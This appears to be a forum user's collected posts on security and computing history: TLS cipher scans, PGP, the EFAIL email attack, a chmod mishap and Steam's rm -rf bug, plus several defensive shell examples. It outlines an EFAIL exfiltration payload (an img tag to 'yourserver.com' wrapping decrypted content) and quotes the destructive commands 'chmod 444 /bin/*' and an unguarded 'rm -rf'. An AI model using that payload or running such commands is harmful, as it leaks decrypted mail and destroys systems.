Firstly, PGP public keys are on the server and placed there by the key owners.
They can be uploaded by anyone who possesses them. Co-workers, anyone with whom you have shared the public key.
646 publicly visible posts • joined 21 Aug 2009
Active Desktop, which allowed HTML content (such as news headlines) to be shown on the user's desktop at the cost of prodigious amounts of CPU and RAM.
And bandwidth. I can remember one cow-orker enabling it, which rapidly became apparent when we looked at the ISDN logs and discovered that his desktop, left on overnight, had been connecting every few minutes, bringing the line up over and over again, incurring a call charge every time.
Routing & Core Network Loss of Resilience
They seem to have had redundancy and no outage.
One update of interest:
Engineers are continuing to work on the fibre break.
The work is currently being delayed by numerous road works.
Not only do they only support TLS1.0, but including RC4-SHA in their cipher list? Really?
Supported Server Cipher(s):
Preferred TLSv1.0 128 bits AES128-SHA
Accepted TLSv1.0 256 bits AES256-SHA
Accepted TLSv1.0 128 bits RC4-SHA
Accepted TLSv1.0 112 bits DES-CBC3-SHA
Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
Accepted TLSv1.0 128 bits RC4-MD5
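An added example, not part of the original post: a small audit function that reads scan lines in the format quoted above and flags the weak entries. The function name `audit_ciphers` and the severity labels are assumptions made for this sketch; the sample input is the cipher list from the post.

```shell
# Sample input: the cipher list quoted in the post above.
scan_output='Preferred TLSv1.0 128 bits AES128-SHA
Accepted TLSv1.0 256 bits AES256-SHA
Accepted TLSv1.0 128 bits RC4-SHA
Accepted TLSv1.0 112 bits DES-CBC3-SHA
Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
Accepted TLSv1.0 128 bits RC4-MD5'

# audit_ciphers (hypothetical helper): read scan lines on stdin and print
# "<severity> <cipher> <reason>" for each finding, then a protocol check.
audit_ciphers() {
  awk '
    $1 != "Preferred" && $1 != "Accepted" { next }   # skip headers and noise
    {
      proto = $2; cipher = $5; seen[proto] = 1
      if (cipher ~ /RC4/)
        print "WEAK", cipher, "RC4 (prohibited in TLS by RFC 7465)"
      else if (cipher ~ /DES-CBC3|3DES/)
        print "WEAK", cipher, "3DES, 64-bit block (Sweet32)"
      if (cipher ~ /MD5$/)
        print "WEAK", cipher, "MD5-based MAC"
      if (cipher !~ /^(ECDHE|DHE)-/)
        print "NOTE", cipher, "no forward secrecy"
    }
    END {
      modern = 0
      for (p in seen) if (p == "TLSv1.2" || p == "TLSv1.3") modern = 1
      if (!modern) print "WEAK", "protocol", "no TLSv1.2 or TLSv1.3 offered"
    }'
}

printf '%s\n' "$scan_output" | audit_ciphers
```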
How many here remember the optical mice on early '80s Sun workstations?
There was a special mouse pad with horizontal and vertical lines on it.
"So crafting a “digital replica” for films, adverts, musicals, for commercial purposes or without explicit written consent is violation of an individual’s rights."
And what about Woody Allen's Zelig and Dead Men Don't Wear Plaid?
The first of two (!) attacks does seem rather simple. Send email with three MIME parts: 1. <img src="http://yourserver.com/ " 2. [PGP encrypted content] 3. "> Mail client decrypts 2, concatenates three parts and does lookup on the URL which you control.
http://seclists.org/oss-sec/2018/q2/104
https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060315.html
We need a crowd-sourced distributed binary (hexagonal?) chop on the RGB triplets to find out exactly where the lawyers stop alleging that a particular shade infringes. We can then mock them mercilessly for claiming that one shade of magenta is OK and an indistinguishable one a fraction away in colour space doesn't.
ZTE: NCSC advice to select telecommunications operators with national security concerns
The NCSC has issued advice to a limited number of UK telecommunications operators regarding the potential use of ZTE equipment and services. ... NCSC assess that the national security risks arising from the use of ZTE equipment or services within the context of the existing UK telecommunications infrastructure cannot be mitigated
I wonder whether the problem was as a result of these vulnerabilities being patched:
https://twitter.com/jobertabma/status/989708798515265539
Jobert Abma, 4:32 am - 27 Apr 2018
In December I found a number of bugs in @gitlab, all of which were disclosed today. The team responded swiftly and professionally and is a pleasure to work with. I'll describe each vulnerability in a separate tweet in this thread. Enjoy them and happy hacking!
http://lists.infradead.org/pipermail/linux-arm-kernel/2018-April/573548.html
Eric Biggers points out that there is no alternative block cipher suitable for low power processors to support dm-crypt or fscrypt filesystem encryption, and the alternative is no encryption at all.
Bruce Schneier's opinion is "Personally, I doubt that they're backdoored"
https://pbs.twimg.com/media/DbiPvH7WsAAj3Iu.jpg
"Loading failed for the <script> with the source "https://dpm.demdex.net/"...
"Loading failed for the <script> with the source "https://visitor-service.tealiumiq.com/"...
What on earth are these doing on a supposedly secure page?
Otto Frisch too, who founded Laser-Scan, which worked with RSRE on liquid crystal displays (see my earlier post).
RSRE (as it had become by the early 80's) and Laser-Scan in Cambridge worked on an alternative to individually driven LCD pixels, by drawing vector graphics using an infra-red laser to switch the phase of the LCD.
Reference to 1984 paper: Laser-Addressed Liquid Crystal Displays
I can still remember the goggles, locked doors and notice: "Do not stare into laser beam with remaining eye".
I would have thought that when BT contracted with Yahoo! to handle their customers' emails, there would have been self-congratulatory press releases on the subject, perhaps naming the muppets who at the time took the credit.
Can I find these anywhere using Google? Not a trace. The "Right to be forgotten" strikes again?
It's not only got to be genuinely random (as John von Neumann said; "Any one who considers arithmetical methods of producing random digits is, of course, in a state of sin"), but if someone else has generated the randomness you are using for your Certificate Signing Request, you cannot guarantee the security of your website ever after.
"A naive assumption is often made that reusing software ... will increase safety because the software will have been exercised extensively. Reusing software modules does not guarantee safety in the new system to which they are transferred...
As demonstrated by the Ariane 5 Launch Failure
more or less exclusively focused on detecting submarines
Mine hunting too. Many years ago I was a contractor at Ferranti, just before they went tits-up as a result of a massive fraud. Simulating sea-bed reflections for a Type 2093 sonar, also graphics for the camera on a ROV ("yellow submarine"). Massive (for those days) Silicon Graphics Onyx / R4400.
I saw a report about this and sent an e-mail containing the following link reporting a Filmology breach on 01-Feb-2018.
They'll be coming for our toast and chips next!
Seeing all the down votes, it prompted me to try and remember what it was that MS did almost 20 years ago to try and abuse the standards procedures. I was most amused to discover that googling for microsoft kerberos "nda" returns, as the top result, Embrace, extend, and extinguish
Make Things Easy / Politicians
The antithesis to this is if you don't want someone to do something, e.g. claim a tax refund, you make it as discouraging as possible.
Web forms that show you the new question only after you have answered the previous one, so you have to keep bothering the same person over and over again for the next answer.
Confusing instructions on web forms.
Long phone calls on hold with irritating music.
Being referred from one phone number to another.
That was my morning just wasted, and I'm sure that the Sir Humphreys of this world have big smug grins on their faces.
Almost as bad as the Vogons'.
Beautiful Railway Bridge of the Silv’ry Tay!
Alas! I am very sorry to say
That ninety lives have been taken away
On the last Sabbath day of 1879,
Which will be remember’d for a very long time.
I've been getting them: 10 in the past month, two only yesterday. I'd just blacklist their IPs but Let's Encrypt use them (mandrill.com / mandrillapp.com / mcsv.net / ROCKET SCIENCE GROUP are all MailChimp aliases).
List of delivery IPs here: https://mailchimp.com/about/ips/
"Innovators who seek to revolutionize and disrupt an industry must tell investors the truth about what their technology can do today, not just what they hope it might do someday."
Magic Leap are you listening?
In 2003 I was working on web proxies for schools: Squid + DansGuardian plus a lot of customisation to allow teachers to turn all internet access on and off, allow only white-listed sites tailored for that particular lesson and block sites on demand. I'd hope that 100% of schools would have some sort of web filtering system.
In those days of limited bandwidth we even had an option to pre-load the Squid cache before the lesson started.
Tracking individual children, however, is a different matter.
That was heroic and ingenious.
My rescue mission to get the system back to normal after someone had typed
chmod 444 /bin/*
involved an 8" floppy and driving from Keighley to Peterborough (about 140 miles) and back.
One moral of the story, which I am still trying to instil into my cow-orkers 30 years later, is use the symbolic modes to add or subtract explicit permissions.
And for today:
X-Clacks-Overhead: GNU Terry Pratchett
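An added example, not part of the original post, showing why the absolute mode in that command is destructive while a symbolic mode is not. It works only inside a `mktemp` scratch directory; the helper names and file names are assumptions made for the illustration.

```shell
# make_scratch_bin: build a scratch "bin" with two executables and a data file.
make_scratch_bin() {
  d=$(mktemp -d) || return 1
  printf '#!/bin/sh\necho ls\n' > "$d/ls"
  printf '#!/bin/sh\necho cp\n' > "$d/cp"
  printf 'data\n' > "$d/README"
  chmod 755 "$d/ls" "$d/cp"
  chmod 644 "$d/README"
  printf '%s\n' "$d"
}

# count_owner_exec DIR: number of files in DIR whose owner execute bit is set,
# read from the ls mode string so the result does not depend on mount options.
count_owner_exec() {
  n=0
  for f in "$1"/*; do
    case $(ls -ld "$f") in
      ???x*) n=$((n + 1)) ;;
    esac
  done
  printf '%s\n' "$n"
}

# apply_and_count MODE: apply MODE to every file in a fresh scratch bin,
# print how many executables survive, then remove the scratch directory.
apply_and_count() {
  dir=$(make_scratch_bin) || return 1
  chmod "$1" "$dir"/*
  count_owner_exec "$dir"
  rm -rf -- "${dir:?}"
}

# Absolute mode replaces every bit, so the execute bits are wiped.
echo "chmod 444: $(apply_and_count 444) of 2 executables left"
# Symbolic modes change only the bits named and leave the rest alone.
echo "chmod a-w: $(apply_and_count a-w) of 2 executables left"
echo "chmod a+r: $(apply_and_count a+r) of 2 executables left"
```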
Valve Steam CLEANS Linux PCs (if you're not careful)
Dodgy shell script triggers classic rm -rf /
rm -rf "$STEAMROOT/"*
But STEAMROOT had not been set
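An added example, not part of the original post and not Valve's code: what the quoted glob targets when the variable is empty, next to a guarded delete. `STEAMROOT` is the name from the quoted line; `first_unguarded_target` and `safe_clean` are hypothetical helpers, and the demo only deletes inside a `mktemp` directory.

```shell
# first_unguarded_target VALUE: expand "$STEAMROOT/"* exactly as the quoted
# line would and print the first match, without deleting anything.
first_unguarded_target() (
  STEAMROOT=$1
  set -- "$STEAMROOT/"*
  printf '%s\n' "$1"
)

# safe_clean DIR: delete the (non-hidden) contents of DIR, refusing unset or
# empty values, paths that are not directories, and the filesystem root.
# Note: `set -u` alone would catch an unset variable but not an empty one.
safe_clean() {
  [ -n "${1-}" ] || { echo "safe_clean: empty path, refusing" >&2; return 1; }
  resolved=$(cd -- "$1" 2>/dev/null && pwd -P) || {
    echo "safe_clean: not a directory: $1" >&2; return 1; }
  [ "$resolved" != / ] || { echo "safe_clean: refusing /" >&2; return 1; }
  # ${resolved:?} aborts the command if the variable were ever empty here.
  rm -rf -- "${resolved:?}"/*
}

# With an empty value the glob is /*, i.e. the top-level directories.
echo "empty STEAMROOT expands to entries such as: $(first_unguarded_target "")"

# Constructed demo on a scratch directory.
scratch=$(mktemp -d)
touch "$scratch/a" "$scratch/b"
safe_clean "$scratch" && echo "scratch directory cleaned"
safe_clean "" || echo "empty value rejected"
rm -rf -- "${scratch:?}"
```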